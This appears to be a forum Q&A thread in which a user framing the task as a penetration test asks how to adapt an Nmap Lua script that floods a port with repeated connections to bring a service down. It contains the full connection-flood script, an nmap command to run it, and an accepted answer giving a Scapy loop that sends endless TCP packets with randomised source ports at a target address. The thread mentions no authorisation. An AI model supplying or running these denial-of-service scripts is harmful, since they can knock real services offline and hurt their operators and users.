# DOS (nmap) Scripts (Penetration Testing)

Tags: lua, port, nmap, penetration-testing

I need to preform a penetration test. I would like to get a script or some scripts together to attack and (hopefully not) bring down a certain port/software by flooding it. I have NMAP installed and an example script from colleague, couldnt anybody explain the script to me and shine any light on how to adjust it to fit my needs?

```
description = [[
Connects to ports without disconnecting
]]
author =""
license = 'Same as Nmap--See http://nmap.org/book/man-legal.html'
categories = {'auth', 'intrusive'}

require('shortport')
require('stdnse')
require('strbuf')
require('math')

local soc
local catch = function() soc:close() end
local try = nmap.new_try(catch)

--portrule = shortport.port_or_service({3000, 3001, 3002, 3003, 3004, 3005,3006,3007,3008,3009, 3010, 3011, 4008, 3110}, 'client server')
--portrule = shortport.port_or_service({3000-4008}, 'client server')
portrule = shortport.port_or_service({3101}, 'client server')

action = function(host, port)
    math.randomseed( os.time() )
    local buff = ""
    soc = nmap.new_socket()
        soc:set_timeout(400000000)
    for j = 1,1100 do
                print(j)
        try(soc:connect(host.ip, port.number, port.protocol))
        --soc:close()
    end
    --print(math.random(255))
    return ""
end
```

Comment: "I would like to get a script or some scripts together to attack and (hopefully not) bring down a certain port/software by flooding it"

Comment: you mean you want to DOS it, what part you' dont understand? you just set variables target.ip, then decide what protocol you want to attack and input port number and protocol

Comment: Yeah!I want to hit a particular port.

Comment: Well, to ping flood it (connect on it a number of times until it timesout)

Answer (score 0, accepted):

I'm not sure that this script is the best way to do things, but in order to run it, you should use this command:

```
nmap -p 3101 --script your-script-name target
```

You'll probably have better luck using a different tool than Nmap. For instance you could use Scapy:

```
$ sudo scapy
>>> p = IP(dst="192.168.1.X") / TCP(dport=3101)
>>> while true:
...   p.sport = random.randint(1024,65535)
...   send(p)
```

Answer (score 0):

http://nmap.org/book/nse-api.html

try setting `function(host='host url here', port='port number here')`

Comment: Good link, but your advice is incorrect. The script has everything it needs to run, it just needs to be run from Nmap, which uses the portrule to determine whether to run.